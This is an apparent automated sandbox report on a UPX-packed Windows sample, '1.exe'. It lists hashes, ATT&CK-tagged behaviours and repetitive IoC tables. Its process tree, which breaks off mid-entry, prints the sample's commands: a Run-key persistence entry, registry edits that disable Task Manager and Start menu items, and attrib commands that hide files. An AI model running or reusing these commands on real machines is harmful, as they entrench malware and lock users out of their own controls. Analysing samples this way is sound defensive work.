280268db673f66dc31e54d86de101cf8b5d52c583a9282d9c7ccb4475612a8e0

Analysis

max time kernel
390s
max time network
363s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
20-11-2024 13:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1.exe
Size

104KB
MD5

5e488441d160b82bdf55b0547f8cb28f
SHA1

f3dc1a56e21b25849e97d32be01afa8e8e0b6269
SHA256

39f3c5f6717bd58b4bd299d6b0ea2eac3c2b62eaa1207b1c15d3e3d09589d6d2
SHA512

85fe28c8b1cbeca5805c305fab96d6eb03bade72e82fe23ddbe7e89b1d29315bb0ded0f1adc41c1c8cfd8e8b888ed1ab03d77cb571912695389d3c064e4dc713
SSDEEP

1536:/e8f5p+nyS3pPEnFZ60oYJjEiVf5ppW0S3pPpnW:28Wny4p2TpjEiVRW04p5W

Score

8^/10

discovery evasion persistence spyware stealer upx

Malware Config

Signatures

Disables Task Manager via registry modification
evasion

Sets file to hidden 1 TTPs 64 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	Process
2996	attrib.exe
2280
988
1572
1000
2832
2780
1676
2164
1672
1056
1104
2224
712
2188
1152
1088
988	attrib.exe
1576	attrib.exe
1144
2420
1916
640
2676
2160
2220
2720
2684
1880
2396
2712
2700
2948
772
844
2244
1580
1372	attrib.exe
2444
2044
2264
2280
1692
2036
1052
1568
2900	attrib.exe
1780
1180
2876
2820
2984
1060	attrib.exe
1804
2760
612
2340
2748
2980	attrib.exe
2028	attrib.exe
876
924
2508
2956

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Micr0soft = "C:\\WINDOWS\\system32\\foto.exe"	reg.exe

Drops autorun.inf file 1 TTPs 64 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

description	ioc	Process
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf	attrib.exe

Drops file in System32 directory 2 IoCs

Processes:

1.exeattrib.exe

description	ioc	Process
File created	C:\Windows\SysWOW64\windows_update.bat	1.exe
File opened for modification	C:\Windows\SysWOW64\windows_update.bat	attrib.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral4/memory/2184-0-0x0000000000400000-0x000000000041C000-memory.dmp	upx
behavioral4/memory/2184-11-0x0000000000400000-0x000000000041C000-memory.dmp	upx

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

xcopy.exexcopy.exexcopy.exeattrib.exetaskkill.exexcopy.exeattrib.exeattrib.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language

Enumerates system info in registry 2 TTPs 64 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

xcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier

Kills process with taskkill 64 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	Process
1528
2832
2528
2512	taskkill.exe
2944	taskkill.exe
1192
2496
912
1392
940
2868
1492	taskkill.exe
2380
696
2404
2864
488	taskkill.exe
848
2416
2372
2252
1648
960
1916
3032
2656
1896	taskkill.exe
868
1900
2096
1596	taskkill.exe
2584
1032
3000
2824
2568
2748
1148
108	taskkill.exe
612	taskkill.exe
2532
2504
844	taskkill.exe
2204
2748
3044
2780
2276	taskkill.exe
1800
2076
2904
1208
2028	taskkill.exe
1476
772
1312
1568
2148
912
2024
2700	taskkill.exe
612	taskkill.exe
1196
2056

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

Processes:

reg.exe

pid	Process
2552	reg.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	Process
Token: SeDebugPrivilege	2652	taskkill.exe
Token: SeDebugPrivilege	2276	taskkill.exe
Token: SeDebugPrivilege	2872	taskkill.exe
Token: SeDebugPrivilege	2876	taskkill.exe
Token: SeDebugPrivilege	2972	taskkill.exe
Token: SeDebugPrivilege	1244	taskkill.exe
Token: SeDebugPrivilege	1896	taskkill.exe
Token: SeDebugPrivilege	1760	taskkill.exe
Token: SeDebugPrivilege	1816	taskkill.exe
Token: SeDebugPrivilege	300	taskkill.exe
Token: SeDebugPrivilege	1828	taskkill.exe
Token: SeDebugPrivilege	1048	taskkill.exe
Token: SeDebugPrivilege	2288	taskkill.exe
Token: SeDebugPrivilege	1080	taskkill.exe
Token: SeDebugPrivilege	1512	taskkill.exe
Token: SeDebugPrivilege	2040	taskkill.exe
Token: SeDebugPrivilege	884	taskkill.exe
Token: SeDebugPrivilege	1352	taskkill.exe
Token: SeDebugPrivilege	1336	taskkill.exe
Token: SeDebugPrivilege	572	taskkill.exe
Token: SeDebugPrivilege	768	taskkill.exe
Token: SeDebugPrivilege	2216	taskkill.exe
Token: SeDebugPrivilege	2552	taskkill.exe
Token: SeDebugPrivilege	2304	taskkill.exe
Token: SeDebugPrivilege	2884	taskkill.exe
Token: SeDebugPrivilege	2748	taskkill.exe
Token: SeDebugPrivilege	2648	taskkill.exe
Token: SeDebugPrivilege	2676	taskkill.exe
Token: SeDebugPrivilege	2296	taskkill.exe
Token: SeDebugPrivilege	2260	taskkill.exe
Token: SeDebugPrivilege	2716	taskkill.exe
Token: SeDebugPrivilege	1228	taskkill.exe
Token: SeDebugPrivilege	2832	taskkill.exe
Token: SeDebugPrivilege	1452	taskkill.exe
Token: SeDebugPrivilege	1916	taskkill.exe
Token: SeDebugPrivilege	488	taskkill.exe
Token: SeDebugPrivilege	2024	taskkill.exe
Token: SeDebugPrivilege	1524	taskkill.exe
Token: SeDebugPrivilege	1116	taskkill.exe
Token: SeDebugPrivilege	448	taskkill.exe
Token: SeDebugPrivilege	1312	taskkill.exe
Token: SeDebugPrivilege	1884	taskkill.exe
Token: SeDebugPrivilege	2500	taskkill.exe
Token: SeDebugPrivilege	2300	taskkill.exe
Token: SeDebugPrivilege	2512	taskkill.exe
Token: SeDebugPrivilege	348	taskkill.exe
Token: SeDebugPrivilege	892	taskkill.exe
Token: SeDebugPrivilege	632	taskkill.exe
Token: SeDebugPrivilege	2196	taskkill.exe
Token: SeDebugPrivilege	2376	taskkill.exe
Token: SeDebugPrivilege	2724	taskkill.exe
Token: SeDebugPrivilege	2808	taskkill.exe
Token: SeDebugPrivilege	2620	taskkill.exe
Token: SeDebugPrivilege	2640	taskkill.exe
Token: SeDebugPrivilege	696	taskkill.exe
Token: SeDebugPrivilege	2848	taskkill.exe
Token: SeDebugPrivilege	2788	taskkill.exe
Token: SeDebugPrivilege	764	taskkill.exe
Token: SeDebugPrivilege	2508	taskkill.exe
Token: SeDebugPrivilege	296	taskkill.exe
Token: SeDebugPrivilege	1736	taskkill.exe
Token: SeDebugPrivilege	540	taskkill.exe
Token: SeDebugPrivilege	2028	taskkill.exe
Token: SeDebugPrivilege	3036	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

1.exe

pid	Process
2184	1.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

1.exeCMD.EXE

description	pid	Process	procid_target
PID 2184 wrote to memory of 2320	2184	1.exe	30
PID 2184 wrote to memory of 2320	2184	1.exe	30
PID 2184 wrote to memory of 2320	2184	1.exe	30
PID 2184 wrote to memory of 2320	2184	1.exe	30
PID 2320 wrote to memory of 2552	2320	CMD.EXE	32
PID 2320 wrote to memory of 2552	2320	CMD.EXE	32
PID 2320 wrote to memory of 2552	2320	CMD.EXE	32
PID 2320 wrote to memory of 2552	2320	CMD.EXE	32
PID 2320 wrote to memory of 2532	2320	CMD.EXE	33
PID 2320 wrote to memory of 2532	2320	CMD.EXE	33
PID 2320 wrote to memory of 2532	2320	CMD.EXE	33
PID 2320 wrote to memory of 2532	2320	CMD.EXE	33
PID 2320 wrote to memory of 1748	2320	CMD.EXE	34
PID 2320 wrote to memory of 1748	2320	CMD.EXE	34
PID 2320 wrote to memory of 1748	2320	CMD.EXE	34
PID 2320 wrote to memory of 1748	2320	CMD.EXE	34
PID 2320 wrote to memory of 1716	2320	CMD.EXE	35
PID 2320 wrote to memory of 1716	2320	CMD.EXE	35
PID 2320 wrote to memory of 1716	2320	CMD.EXE	35
PID 2320 wrote to memory of 1716	2320	CMD.EXE	35
PID 2320 wrote to memory of 816	2320	CMD.EXE	36
PID 2320 wrote to memory of 816	2320	CMD.EXE	36
PID 2320 wrote to memory of 816	2320	CMD.EXE	36
PID 2320 wrote to memory of 816	2320	CMD.EXE	36
PID 2320 wrote to memory of 2280	2320	CMD.EXE	37
PID 2320 wrote to memory of 2280	2320	CMD.EXE	37
PID 2320 wrote to memory of 2280	2320	CMD.EXE	37
PID 2320 wrote to memory of 2280	2320	CMD.EXE	37
PID 2320 wrote to memory of 2452	2320	CMD.EXE	38
PID 2320 wrote to memory of 2452	2320	CMD.EXE	38
PID 2320 wrote to memory of 2452	2320	CMD.EXE	38
PID 2320 wrote to memory of 2452	2320	CMD.EXE	38
PID 2320 wrote to memory of 2760	2320	CMD.EXE	39
PID 2320 wrote to memory of 2760	2320	CMD.EXE	39
PID 2320 wrote to memory of 2760	2320	CMD.EXE	39
PID 2320 wrote to memory of 2760	2320	CMD.EXE	39
PID 2320 wrote to memory of 2244	2320	CMD.EXE	40
PID 2320 wrote to memory of 2244	2320	CMD.EXE	40
PID 2320 wrote to memory of 2244	2320	CMD.EXE	40
PID 2320 wrote to memory of 2244	2320	CMD.EXE	40
PID 2320 wrote to memory of 2764	2320	CMD.EXE	41
PID 2320 wrote to memory of 2764	2320	CMD.EXE	41
PID 2320 wrote to memory of 2764	2320	CMD.EXE	41
PID 2320 wrote to memory of 2764	2320	CMD.EXE	41
PID 2320 wrote to memory of 2812	2320	CMD.EXE	42
PID 2320 wrote to memory of 2812	2320	CMD.EXE	42
PID 2320 wrote to memory of 2812	2320	CMD.EXE	42
PID 2320 wrote to memory of 2812	2320	CMD.EXE	42
PID 2320 wrote to memory of 2816	2320	CMD.EXE	43
PID 2320 wrote to memory of 2816	2320	CMD.EXE	43
PID 2320 wrote to memory of 2816	2320	CMD.EXE	43
PID 2320 wrote to memory of 2816	2320	CMD.EXE	43
PID 2320 wrote to memory of 2884	2320	CMD.EXE	44
PID 2320 wrote to memory of 2884	2320	CMD.EXE	44
PID 2320 wrote to memory of 2884	2320	CMD.EXE	44
PID 2320 wrote to memory of 2884	2320	CMD.EXE	44
PID 2320 wrote to memory of 2896	2320	CMD.EXE	45
PID 2320 wrote to memory of 2896	2320	CMD.EXE	45
PID 2320 wrote to memory of 2896	2320	CMD.EXE	45
PID 2320 wrote to memory of 2896	2320	CMD.EXE	45
PID 2320 wrote to memory of 3028	2320	CMD.EXE	46
PID 2320 wrote to memory of 3028	2320	CMD.EXE	46
PID 2320 wrote to memory of 3028	2320	CMD.EXE	46
PID 2320 wrote to memory of 3028	2320	CMD.EXE	46

Views/modifies file attributes 1 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	Process
1312
2648
2952
1928
892
1356
2688
1508
2140
2820
1000	attrib.exe
1860	attrib.exe
2648
1576
2380
1632
2288
1084
2528
1736
1876
1084
2080
892
500
2156
2768
2828
1060	attrib.exe
2508	attrib.exe
2492
2832
2732
2964
884
2212
2176	attrib.exe
844
2988
1604
1732
1032
2684	attrib.exe
2568
1904
3032
2364
2568
2468
2852	attrib.exe
2404
928
1880
2844
2044
2504
2740	attrib.exe
1616	attrib.exe
2900	attrib.exe
2620
868
2748
2564	attrib.exe
2732	attrib.exe

C:\Users\Admin\AppData\Local\Temp\1.exe
"C:\Users\Admin\AppData\Local\Temp\1.exe"
1⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2184
- C:\Windows\SysWOW64\CMD.EXE
  CMD.EXE /C "%windir%\system32\windows_update.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2320
- - C:\Windows\SysWOW64\reg.exe
    reg add hklm\software\microsoft\windows\currentversion\run /v Micr0soft /t reg_sz /d "C:\WINDOWS\system32\foto.exe" /f
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:2552
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t reg_dword /d 00000001
    3⤵
    PID:2532
- - C:\Windows\SysWOW64\reg.exe
    Reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskbar /t reg_dword /d 00000001 /f
    3⤵
    PID:1748
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t reg_dword /d 00000001
    3⤵
    PID:1716
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +r C:\Windows\system32\foto.exe /s
    3⤵
    PID:816
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r C:\Windows\system32\windows_update.bat /s
    3⤵
    - Drops file in System32 directory
    PID:2280
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg"
    3⤵
    PID:2452
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Blue_Gradient.jpg"
    3⤵
    PID:2760
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg"
    3⤵
    PID:2244
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg"
    3⤵
    PID:2764
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg"
    3⤵
    PID:2812
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Monet.jpg"
    3⤵
    PID:2816
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Notebook.jpg"
    3⤵
    PID:2884
- - C:\Windows\SysWOW64\attrib.exe
